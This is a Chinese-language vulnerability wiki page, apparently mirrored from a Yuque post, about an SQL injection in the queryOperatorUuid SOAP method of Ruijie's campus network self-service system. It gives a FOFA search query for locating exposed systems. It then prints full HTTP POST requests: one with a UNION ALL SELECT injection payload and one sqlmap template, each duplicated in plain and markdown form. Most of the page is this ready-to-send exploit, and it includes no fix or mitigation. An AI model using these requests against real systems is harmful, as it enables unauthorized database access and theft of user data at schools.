fofamini-wiki

登录白背景

源码

锐捷网络股份有限公司校园网自助服务系统queryOperatorUuid存在SQL注入漏洞

一、漏洞简介

锐捷网络股份有限公司校园网自助服务系统queryOperatorUuid存在SQL注入漏洞。

二、影响版本

锐捷网络股份有限公司校园网自助服务系统

三、资产测绘

fofaapp="校园网自助服务系统"
特征

四、漏洞复现

POST /selfservice/service/operatorReportorRoamService HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=42E7A33A54CABB1580E34F01B3D63480; JSESSIONID=0616C2E6B689FD5702EE3E2203D660FB
Connection: close
SOAPAction: 
Content-Type: text/xml;charset=UTF-8
Host: 
Content-Length: 334

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.webservice.common.spl.ruijie.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:queryOperatorUuid>
         <!--type: string-->
         <ser:in0>' UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(78)+CHAR(112)+CHAR(87)+CHAR(74)+CHAR(122)+CHAR(111)+CHAR(71)+CHAR(118)+CHAR(74)+CHAR(97)+CHAR(68)+CHAR(71)+CHAR(119)+CHAR(97)+CHAR(103)+CHAR(118)+CHAR(115)+CHAR(70)+CHAR(97)+CHAR(82)+CHAR(75)+CHAR(68)+CHAR(101)+CHAR(122)+CHAR(75)+CHAR(113)+CHAR(115)+CHAR(70)+CHAR(81)+CHAR(86)+CHAR(72)+CHAR(75)+CHAR(112)+CHAR(90)+CHAR(119)+CHAR(116)+CHAR(88)+CHAR(119)+CHAR(102)+CHAR(109)+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(113)-- sfXj</ser:in0>
      </ser:queryOperatorUuid>
   </soapenv:Body>
</soapenv:Envelope>

sqlmap

POST /selfservice/service/operatorReportorRoamService HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=42E7A33A54CABB1580E34F01B3D63480; JSESSIONID=0616C2E6B689FD5702EE3E2203D660FB
Connection: close
SOAPAction: 
Content-Type: text/xml;charset=UTF-8
Host: 
Content-Length: 334

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.webservice.common.spl.ruijie.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:queryOperatorUuid>
         <!--type: string-->
         <ser:in0>*</ser:in0>
      </ser:queryOperatorUuid>
   </soapenv:Body>
</soapenv:Envelope>

原文: https://www.yuque.com/xiaokp7/ocvun2/fiik96hl80srnoix

# 锐捷网络股份有限公司校园网自助服务系统queryOperatorUuid存在SQL注入漏洞

# 一、漏洞简介
锐捷网络股份有限公司校园网自助服务系统queryOperatorUuid存在SQL注入漏洞。

# 二、影响版本

- 锐捷网络股份有限公司校园网自助服务系统

# 三、资产测绘

- fofa`app="校园网自助服务系统"`
- 特征

![image.png](./img/CGYOq5xktBYeRamx/1698596756667-deb61ce2-460f-4df0-bfb5-037838f17027-397432.png)

# 四、漏洞复现
```
POST /selfservice/service/operatorReportorRoamService HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=42E7A33A54CABB1580E34F01B3D63480; JSESSIONID=0616C2E6B689FD5702EE3E2203D660FB
Connection: close
SOAPAction: 
Content-Type: text/xml;charset=UTF-8
Host: 
Content-Length: 334

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.webservice.common.spl.ruijie.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:queryOperatorUuid>
         
         <ser:in0>' UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(78)+CHAR(112)+CHAR(87)+CHAR(74)+CHAR(122)+CHAR(111)+CHAR(71)+CHAR(118)+CHAR(74)+CHAR(97)+CHAR(68)+CHAR(71)+CHAR(119)+CHAR(97)+CHAR(103)+CHAR(118)+CHAR(115)+CHAR(70)+CHAR(97)+CHAR(82)+CHAR(75)+CHAR(68)+CHAR(101)+CHAR(122)+CHAR(75)+CHAR(113)+CHAR(115)+CHAR(70)+CHAR(81)+CHAR(86)+CHAR(72)+CHAR(75)+CHAR(112)+CHAR(90)+CHAR(119)+CHAR(116)+CHAR(88)+CHAR(119)+CHAR(102)+CHAR(109)+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(113)-- sfXj</ser:in0>
      </ser:queryOperatorUuid>
   </soapenv:Body>
</soapenv:Envelope>
```
![image.png](./img/CGYOq5xktBYeRamx/1713339526996-c4b61f16-f5de-4d3e-85af-795705ad1083-300681.png)
sqlmap
```
POST /selfservice/service/operatorReportorRoamService HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=42E7A33A54CABB1580E34F01B3D63480; JSESSIONID=0616C2E6B689FD5702EE3E2203D660FB
Connection: close
SOAPAction: 
Content-Type: text/xml;charset=UTF-8
Host: 
Content-Length: 334

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.webservice.common.spl.ruijie.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:queryOperatorUuid>
         
         <ser:in0>*</ser:in0>
      </ser:queryOperatorUuid>
   </soapenv:Body>
</soapenv:Envelope>
```
![image.png](./img/CGYOq5xktBYeRamx/1713339549536-41e09949-bf58-475b-b1ef-882302b397c9-323884.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fiik96hl80srnoix>